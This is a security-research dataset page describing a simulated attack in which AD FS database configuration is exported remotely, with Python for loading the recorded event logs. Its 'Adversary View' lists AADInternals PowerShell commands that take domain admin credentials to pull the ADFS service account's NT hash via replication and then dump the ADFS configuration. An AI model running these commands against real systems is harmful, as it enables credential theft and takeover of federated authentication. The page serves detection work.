Export ADFS Database Configuration Remotely
Contents
Export ADFS Database Configuration Remotely#
Metadata#
Contributors |
Roberto Rodriguez @Cyb3rWard0g |
Creation Date |
2021/04/27 |
Modification Date |
2021/04/27 |
Tactics |
|
Techniques |
|
Tags |
None |
Dataset Description#
This dataset represents a threat actor exporting the AD FS database configuration remotely over http.
Datasets Downloads#
Type |
Link |
|---|---|
Host |
|
Network |
Simulation Metadata#
Tools#
type |
Name |
Module |
|---|---|---|
PowerShell Module |
AADInternals |
Export-AADIntADFSConfiguration |
Adversary View#
# ADFS Service Account
$UserObjectGUID = 'd1713029-72e2-4101-8486-1db074944f23'
# Domain Admin credentials
$credentials = get-credential
# Get Hash via AD replication
$Hash = Get-AADIntADUserNTHash -ObjectGuid $UserObjectGUID -Credentials $credentials -Server 'DC01.blacksmith.local' -AsHex
# Retrieve AD FS database configuration over HTTP
$ADFSDatabaseConfig = Export-AADIntADFSConfiguration -Hash '97bff5626068f351a5f9891b97b04640' -SID 'S-1-5-21-3226634481-2224579835-4276826623-1103' -Server ADFS01.blacksmith.local
Explore Datasets#
Download & Decompress Dataset#
import requests
from zipfile import ZipFile
from io import BytesIO
url = https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/aadinternals_export_adfsdatabaseconfig_remotely.zip
zipFileRequest = requests.get(url)
zipFile = ZipFile(BytesIO(zipFileRequest.content))
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])
Read JSON File#
from pandas.io import json
df = json.read_json(path_or_buf=datasetJSONPath, lines=True)
Access Security Events#
df.groupby(['Channel']).size().sort_values(ascending=False)